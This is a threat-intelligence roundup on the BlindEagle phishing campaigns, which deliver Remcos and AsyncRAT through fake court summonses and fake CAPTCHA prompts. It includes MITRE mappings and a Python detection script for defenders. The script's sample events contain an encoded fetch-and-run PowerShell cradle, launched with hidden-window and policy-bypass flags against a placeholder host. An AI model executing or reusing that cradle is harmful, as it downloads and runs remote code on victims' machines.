October 2024: Recent Cyber Attacks Identified by ANY.RUN

ANY.RUN’s October 2024 roundup highlights the BlindEagle (APT-C-36) campaign targeting LATAM via phishing and Remote Access Tools like Remcos and AsyncRAT, with additional campaigns using fake CAPTCHA prompts and encoded JavaScript to deliver payloads. It also notes how trusted services (Discord, Google Drive, Bitbucket, Pastee, YDRAY) are used to bypass filters and deliver malicious content. Hashtags: #BlindEagle #APT-C-36 #Remcos #AsyncRAT #Lumma #LATAM

Key points

  • APT-C-36 (BlindEagle) targets the LATAM region with phishing to gain remote control over devices.
  • The group uses trusted online services (Discord, Google Drive, Bitbucket, Pastee, YDRAY) to deliver payloads and bypass security filters.
  • Phishing campaigns include fake court hearing invitations to lure victims into downloading malicious payloads.
  • Remcos and AsyncRAT are the group's primary Remote Access Tools.
  • Fake CAPTCHA prompts are used to trick victims into executing malicious PowerShell scripts.
  • Encoded JavaScript files are used to conceal malware and evade detection.
  • ANY.RUN provides Threat Intelligence Lookup and an interactive sandbox to analyze threats.
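The two delivery patterns in the key points above, an archive or mail client spawning a script host and a fake CAPTCHA page talking the user into pasting a PowerShell command into the Run dialog, both surface in process-creation telemetry. The script below is an added example, not code from ANY.RUN or from the roundup: it triages a handful of constructed process-creation events (field names loosely modelled on Sysmon Event ID 1, not real campaign telemetry), flags the two chains, and decodes any -EncodedCommand argument so the download cradle can be read. The parent/child heuristics and the placeholder URL are assumptions; the only fixed fact relied on is that powershell.exe's -EncodedCommand takes Base64 of the UTF-16LE command text and accepts any unambiguous prefix of the flag name (-e, -ec, -enc).

```python
import base64
import binascii
import re

# Stand-in for an attacker's download cradle. The URL is a constructed placeholder.
STAGE_CMD = "iex (iwr http://example.invalid/stage -UseBasicParsing)"
# powershell.exe -EncodedCommand expects Base64 over the UTF-16LE bytes of the command.
ENCODED_STAGE = base64.b64encode(STAGE_CMD.encode("utf-16-le")).decode("ascii")

# Constructed events, not real telemetry. Event 1: user opens a mail attachment in WinRAR
# (benign on its own). Event 2: the archive launches a .js via wscript.exe. Event 3: a
# Run-dialog PowerShell launch (explorer.exe parent) with hidden window and encoded command.
# Event 4: ordinary activity that must not alert.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "cmdline": r'"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\u\AppData\Local\Temp\Citacion.rar"'},
    {"parent": r"C:\Program Files\WinRAR\WinRAR.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\u\AppData\Local\Temp\Rar$DIa1\Citacion.js"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc " + ENCODED_STAGE},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe readme.txt"},
]

# Assumed heuristics: which parents indicate a phishing delivery chain, and which children
# are script hosts that a mail client or archiver has no business launching.
DELIVERY_PARENTS = {"outlook.exe", "winrar.exe", "7zfm.exe", "winword.exe", "excel.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Hidden window, execution-policy bypass, or no-profile flags (prefix forms included).
EVASION_FLAGS = re.compile(r"-w[a-z]*\s+hidden|-e[px][a-z]*\s+bypass|-nop\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext behind a -EncodedCommand argument, or None if absent or undecodable."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        name = flag.lstrip("-/").lower()
        # Any prefix of "encodedcommand" (-e, -ec, -enc, ...) is accepted by powershell.exe.
        if flag[:1] in "-/" and name and "encodedcommand".startswith(name):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError, ValueError):
                return None
    return None


def triage(events):
    """Apply both detection rules to a list of process-creation events and return alerts."""
    alerts = []
    for ev in events:
        parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
        if parent in DELIVERY_PARENTS and image in SCRIPT_HOSTS:
            alerts.append({"rule": "mail_or_archive_to_script_host",
                           "parent": parent, "image": image, "decoded": None})
        elif parent == "explorer.exe" and image in POWERSHELL:
            decoded = decode_encoded_command(cmd)
            if decoded is not None or EVASION_FLAGS.search(cmd):
                alerts.append({"rule": "fake_captcha_powershell",
                               "parent": parent, "image": image, "decoded": decoded})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["rule"], alert["parent"], "->", alert["image"], "|", alert["decoded"] or "")
```

Event 1 (OUTLOOK.EXE opening an archive) deliberately does not alert on its own; the signal is the archiver spawning wscript.exe in event 2, which is what the OUTLOOK.EXE and WinRAR command-line filters listed under the indicators below are used to pivot on in Threat Intelligence Lookup. Decoding the encoded command matters because the Base64 blob itself changes per campaign while the cradle inside it usually does not.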

MITRE Techniques

  • [T1566] Phishing – Attackers send emails that appear legitimate (for example, fake court hearing invitations) to trick users into downloading malware.
  • [T1219] Remote Access Software – BlindEagle uses Remcos and AsyncRAT as its primary tools for remote access to victims' systems.
  • [T1059.001] Command and Scripting Interpreter: PowerShell (the roundup cites the retired ID T1086) – Malicious PowerShell scripts are executed by users who are tricked into running them via fake CAPTCHA prompts.
  • [T1027] Obfuscated Files or Information – Encoded JavaScript files hide malicious intent and evade detection.
  • [T1071.001] Application Layer Protocol: Web Protocols – Remcos RAT attempts to communicate with a Command and Control (C2) server by establishing a TLS connection to an external host.

Indicators of Compromise

  • [Executable] Remcos – primary RAT used for remote access in BlindEagle campaigns.
  • [Executable] AsyncRAT – used alongside Remcos for remote access.
  • [Malware] Lumma – information stealer delivered via the fake CAPTCHA campaigns.
  • [Process Name] OUTLOOK.EXE – used as a process-name filter in Threat Intelligence Lookup queries. – commandLine:"OUTLOOK.EXE"
  • [Archive Tool] WinRAR – used for payload packaging / archiving, and as a Threat Intelligence Lookup filter. – commandLine:"WinRAR"
  • [Network] TLS/C2 Communication – RATs establishing a TLS-encrypted channel to a C2 server; in the sandbox this shows as a Remcos connection attempt to an external server.

Read more: https://any.run/cybersecurity-blog/cybersecurity-blog/cyber-attacks-october-2024/